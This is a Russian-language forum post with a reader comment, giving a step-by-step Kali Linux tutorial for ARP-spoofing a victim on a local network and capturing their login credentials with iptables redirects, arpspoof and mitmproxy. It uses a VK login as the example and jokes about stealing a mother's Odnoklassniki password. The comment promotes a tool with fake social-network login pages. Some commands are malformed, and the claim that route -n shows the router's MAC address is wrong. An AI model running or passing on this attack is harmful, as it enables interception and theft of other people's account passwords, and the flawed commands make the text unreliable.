Сразу скажу метод для линуксоидов, а именно Кали 2.0 Сперва немного теории, буду объяснять своими словами Как это происходит? - У нас есть роутер, к ним подключены два компьютера. Компьютер хакера и компьютер жертвы. Компьютер хакера меняет свой мак адрес на адрес роутера, т.е. заставляет компьютер жертвы думать, что он роутер, и отправлять ему данные по протоколам. Компьютер хакера получает данные с роутера и пропускает их через себя, отправляя данные компьютеру жертве, при этом изменяется защищенный протокол на незащищенный (по этому можно спалиться, когда в адресной строке видно что протокол незащищенный или при авторизации на учтенки в некоторых браузерах и доменах не хочет пропускать). В компьютере хакера мы имеем весь лог запросов и отправок всяких данных с компьютера жертвы. Вот и вся теория, перейдем к практике. Сначала мы смотрим в консоли информацию о подключениях пк командой ifconfig Мы видим что у нас IP адрес, к примеру, 192.168.1.65 Теперь с помощью команды fping -Asg 192.168.1.0/24 -r 5 >>fping.txt сканируем информацию о сети и записываем ее в файл fping.txt Где: 1) 192.168.1.0/24 - проводится сканирование по всем шлюзам от 0 до 255 2) цифра 5 между -r и >>fping.txt мы выбираем сколько раз мы будем сканировать сеть, лучше ее отсканить пару раз, так как за один раз может плохо отсканить и выдаст мало информации Здесь мы с помощью команды cat fping.txt | grep alive смотрим, кто находится в сети в режиме реального времени, т.е. юзают сеть, залазя в файл и находя строки с пометкой alive Мы получим список IP адресов которые сейчас юзают сеть. Смотрим мак адрес нашего роутера командой route -n. В колонке Gateway у нас первым елементом будет мак адрес роутера, к примеру, 192.168.1.100 Роутер атаковать не имеет смысла, так как ничего полезного мы не добудем. Теперь нам нужно перенаправить траффик командами: iptables -t nat -A PREROUTING -p -tcp --destination-port 80 -j REDIRECT --to-port 8080 iptables -t nat -A PREROUTING -p -tcp --destination-port 443 -j REDIRECT --to-port 8080 Далее обрабатываем данные с помощью mitmproxy (если не установлен, то установите) Для этого пишем команду mitmproxy -T --host Потом нужно перенаправить данные командой echo 1 >/proc/sys/net/ipv4/ip_forward Потом запускаем сам процесс командой arpspoof -i eth0 -t 192.168.1.13 192.168.100 Где 1-й айпишник это айпи жертвы, а 2-й айпишник роутера Дальше с этого момента, если кто-то с компьютера жертвы будет заходить в какую-то учетку, его данные для входа будут сохранены у нас в логах. Логи можно будет посмотреть в mitmproxy, когда вы закончите атаку. Далее в логах ищем строку, которая начинается со слова POST и смотрим на домен, если это учетка вконтакте, то там должно быть login.vk.com, нажимаем на нее, и там будут данные для входа. Ничего сложного, даже чайник розберется. Вот теперь ты знаешь как узнать пароль от одноклассников своей мамки)) Удачи тебе в этом. Если нужно больше инфо, то тебе сюда: (не реклама) (не реклама) копипаст
урок конечно хороший, но по моему мнению для "WiFi чайников" подойдет больше Pumpkin, с графической оболочкой и как по мне с очень удачно реализованными фэйками всех известных соц сетей , почт итд. И работает все стабильние чем Mitmf-s , Mitmf-htts.